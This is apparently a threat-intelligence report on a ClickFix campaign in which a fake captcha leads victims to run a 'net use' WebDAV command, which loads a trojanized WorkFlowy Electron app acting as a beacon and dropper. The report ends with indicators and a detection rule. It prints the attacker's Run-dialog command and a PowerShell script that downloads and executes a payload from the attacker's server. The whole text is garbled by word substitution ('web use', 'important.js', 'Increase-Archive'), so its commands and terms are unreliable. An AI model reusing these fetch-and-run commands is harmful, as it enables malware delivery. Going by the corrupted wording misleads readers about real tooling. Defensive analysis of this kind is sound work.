Disclaimer: This report has been ready by the Risk Analysis Heart to reinforce cybersecurity consciousness and assist the strengthening of protection capabilities. It’s primarily based on unbiased analysis and observations of the present risk panorama out there on the time of publication. The content material is meant for informational and preparedness functions solely.
Learn extra blogs round risk intelligence and adversary analysis: https://atos.web/en/lp/cybershield
Abstract
Atos Researchers recognized a brand new variant of the favored ClickFix method, the place attackers persuade the person to execute a malicious command on their very own machine via the Win + R shortcut. On this variation, a “web use” command is used to map a community drive from an exterior server, after which a “.cmd” batch file hosted on that drive is executed. Script downloads a ZIP archive, unpacks it, and executes the reliable WorkFlowy utility with modified, malicious logic hidden inside “.asar” archive. This acts as a C2 beacon and a dropper for the ultimate malware payload.
 |
| Determine 1: Excessive-level overview of assault circulate. |
Assault overview
On this model, the preliminary vector of assault is similar as in all the opposite ones, an internet web page posing as a captcha mechanism – “happyglamper[.]ro”. It prompts the person to open the Run utility by way of “Win+R”, adopted by “Ctrl+V” and “Enter”
 |
| Determine 2: Phishing web site 1 |
 |
| Determine 3: Phishing web site 2 |
This executes the next command:
“cmd.exe” /c web use Z: http://94.156.170[.]255/webdav /persistent:no && “Z:replace.cmd” & web use Z: /deleteUsually, at this stage, attackers have used PowerShell or mshta to obtain and execute the subsequent stage of the malware. Right here, as a substitute, we are able to see that “web use” is getting used to map and connect with a community drive of an exterior server from which a Batch script is executed. Whereas not novel, these TTPs have been by no means seen in ClickFix assaults earlier than. Mixed with the subsequent unusual phases of an infection patterns, this marketing campaign provides Adversaries excessive probabilities to evade defensive controls and keep below the radar of defenders.
On this case, the noticed ClickFix variant of execution circulate efficiently bypassed the detection of Microsoft Defender for Endpoint. Atos safety groups have been in a position to detect it solely because of the inner Risk Looking service specializing in the principle behavioral facet of the ClickFix method – preliminary execution via the RunMRU registry key (looking question out there within the Appendix part).
The preliminary execution script “replace.cmd” is loaded from the mapped drive and executed; after that, the mapped drive is eliminated. Content material of “replace.cmd”:
begin "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'http://94.156.170[.]255/flowy.zip' -OutFile "$env:TEMPdl.zip";
Increase-Archive "$env:TEMPdl.zip" -DestinationPath "$env:LOCALAPPDATAMyApp" -Drive;
Begin-Course of "$env:LOCALAPPDATAMyAppWorkFlowy.exe""This spawns a PowerShell occasion which downloads a zipper archive and extracts it into “%LOCALAPPDATApercentMyApp” listing. Then it executes “WorkFlowy.exe” binary.
 |
| Determine 4: Content material of flowy.zip archive |
WorkFlowy evaluation
The archive accommodates a WorkFlowy desktop utility (model 1.4.1050), signed by the developer “FunRoutine Inc.”, distributed as an Electron utility bundle. Electron purposes are written utilizing standard internet applied sciences – HTML, CSS, and JavaScript – and use “.asar” archives to pack supply code throughout utility packing. It’s executed for numerous causes, like mitigating points round lengthy path names on Home windows. The malicious code was injected into important.js, the Node.js entry level of the app, hidden contained in the app.asar archive.
Technical Profile
| Property | Worth |
| Goal utility | WorkFlowy Desktop (Electron) |
| Malicious model | 1.4.1050 |
| Malicious file | sources/app.asar → /important.js |
| C2 area | cloudflare.report/perpetually/e/ |
| C2 origin IP | 144[.]31[.]165[.]173 (Frankfurt, AS215439 play2go.cloud) |
| Area registered | January 2026, HK registrant, OnlineNIC registrar |
| Sufferer ID file | %APPDATApercentid.txt |
| Dropper staging dir | %TEMP%[unix_timestamp] |
An infection Vector
The malicious ASAR archive is a direct alternative for the reliable sources/app.asar. The attacker repackaged an older model of the app (v1.4 vs. the present v4.3) with injected code.
 |
| Determine 5: Content material of “sources” subdirectory |
Malicious Code (Dropper/Beacon)
When WorkFlowy is executed, it appears for app.asar file within the relative path hardcoded into the binary. It then reads the principle.js file from inside it, decodes it to a string, and parses it to the embedded V8 Google JavaScript engine, which executes it. Attackers have changed the reliable important.js with one they’ve created themselves. As an alternative of well-structured scripts, they’ve used closely obfuscated on-liner construction, including malicious code on high of reliable one, making certain it’s executed first and blocking WorkFlowy performance.
Malicious code accommodates a number of vital features:
- Malware executes earlier than the reliable utility begins: The injected IIFE opens with await f() — the infinite C2 beacon loop. As a result of f() by no means resolves, all reliable WorkFlowy initialization code that follows is completely blocked. The malware runs with full Node.js privileges instantly on launch.
- Persistent sufferer fingerprinting by way of %APPDATApercentid.txt: A random 8-character alphanumeric ID is generated on first run and written to %APPDATApercentid.txt. On subsequent runs, the saved ID is learn again, giving the attacker a steady identifier for every sufferer machine throughout periods.
- C2 beacon — exfiltrates host id each 2 seconds: Operate u() sends an HTTP POST containing the sufferer’s distinctive ID, machine title, and Home windows username to the C2 server. The loop in f() repeats this indefinitely with a 2-second interval.
- Distant payload obtain and execution: Operate p() receives a job object from the C2, decodes base64-encoded file contents, writes them to a timestamped listing below %TEMP%, and executes any .exe by way of child_process.exec.
If the C2 connection isn’t established, no recordsdata or directories are generated. On the time of this evaluation, the C2 area was already unresponsive.
Why Electron is an Efficient Supply mechanism
The malicious code runs within the Node.js important course of – exterior the Chromium sandbox – with the total privileges of the logged-in person, permitting for the malicious code to execute any actions the person is allowed to do on the system. No recordsdata are literally written to disk, and because the malicious payload is packed inside “.asar” archive, it moreover helps to cover malicious code.
Persistence
No OS-level persistence is applied by way of the dropper. The beacon runs solely whereas WorkFlowy is open. The one artifact written to disk earlier than subsequent stage supply is %APPDATApercentid.txt (sufferer monitoring ID), and that’s provided that the connection to C2 is established appropriately. Presumably, an OS-level persistence is delegated to no matter payload the C2 delivers by way of the dropper.
Learn extra blogs round risk intelligence and adversary analysis: https://atos.web/en/lp/cybershield
Key takeaways
This ClickFix variant is critical as a result of it strikes preliminary entry away from generally abused scripting and execution engines comparable to PowerShell, MSHTA, and WScript, and as a substitute depends on web use to abuse WebDAV as a supply mechanism. Earlier ClickFix campaigns usually uncovered themselves by instantly invoking interpreters or residing‑off‑the‑land binaries which might be closely monitored by trendy EDR options. In distinction, this iteration mounts a distant WebDAV share as a neighborhood drive, executes a hosted batch file via normal filesystem semantics, and removes the mapping instantly after use. This reveals that ClickFix nonetheless evolves, increasing its arsenal of proxy execution strategies and beginning to make the most of native networking utilities.
The malicious logic is hidden by changing the content material of the Workflowy utility’s app.asar archive with a trojanized model of important.js. As a result of the code runs contained in the Electron important course of and stays packaged inside a reliable utility, it avoids many file‑primarily based and behavioral detections that concentrate on standalone loaders or script interpreters. ASAR archives are hardly ever inspected, permitting the dropper logic to execute via regular utility startup with minimal visibility.
This exercise was not detected by safety controls and was solely recognized via focused risk looking at Atos. Detection relied on analyzing execution context slightly than payload indicators, particularly trying to find suspicious command execution originating from the Explorer Run dialog (recorded contained in the RunMRU Registry Key). This underscores the rising significance of risk looking as a complementary detection mechanism: as ClickFix campaigns shift towards native utilities and trusted purposes that generate few alerts, solely proactive, hypothesis-driven looking will help floor these weak indicators early sufficient to disrupt the assault chain.
Appendixes
IOCs
| Area | cloudflare[.]report |
| Area | happyglamper[.]ro |
| IP | 94[.]156[.]170[.]255 |
| IP | 144[.]31[.]165[.]173 |
| URL | https://cloudflare[.]report/perpetually/e/ |
| File | %APPDATApercentid.txt |
| Path | %TEMP%[13-digit-timestamp] |
| SHA256 | a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 (app.asar) |
| SHA256 | 9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42 (WorkFlowy.exe – Older model of reliable binary, not malicious) |
| SHA256 | dc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829 (important.js) |
Looking Question
- title: Suspicious Instructions executed by way of Run dialog
- id: 20891a30-032e-4f15-a282-fa4a8b0d8aae
- standing: experimental
- description:
- Detects suspicious command interpreters and LOLBins written into the Explorer RunMRU registry key (generally used for Run dialog historical past), with explorer.exe because the initiating course of.
- writer: TRC
- date: 2026-03-05
- tags:
- – assault.execution
- – assault.t1059
- – assault.defense_evasion
- logsource:
- class: registry_set
- product: home windows
- definition: “Sysmon Occasion ID 13 (Registry worth set) or equal EDR registry telemetry”
- detection:
- selection_key:
- TargetObject|accommodates: ‘SOFTWAREMicrosoftWindowsCurrentVersionExplorerRunMRU’
- selection_proc:
- Picture|endswith: ‘explorer.exe’
- selection_data:
- Particulars|accommodates:
- – ‘cmd ‘
- – ‘powershell ‘
- – ‘cmd.exe ‘
- – ‘powershell.exe ‘
- – ‘wscript.exe ‘
- – ‘cscript.exe ‘
- – ‘web.exe ‘
- – ‘net1.exe ‘
- – ‘sh.exe ‘
- – ‘bash.exe ‘
- – ‘schtasks.exe ‘
- – ‘regsvr32.exe ‘
- – ‘hh.exe ‘
- – ‘wmic.exe ‘
- – ‘mshta.exe ‘
- – ‘rundll32.exe ‘
- – ‘msiexec.exe ‘
- – ‘forfiles.exe ‘
- – ‘scriptrunner.exe ‘
- – ‘mftrace.exe ‘
- – ‘AppVLP.exe ‘
- – ‘svchost.exe ‘
- – ‘msbuild.exe ‘
- situation: selection_key and selection_proc and selection_data
- falsepositives:
- – “Reputable administrative exercise utilizing Run dialog (Win+R) to execute built-in instruments.”
- – “IT scripts or troubleshooting steps executed interactively by a person.”
- stage: medium
Learn extra blogs round risk intelligence and adversary analysis: https://atos.web/en/lp/cybershield
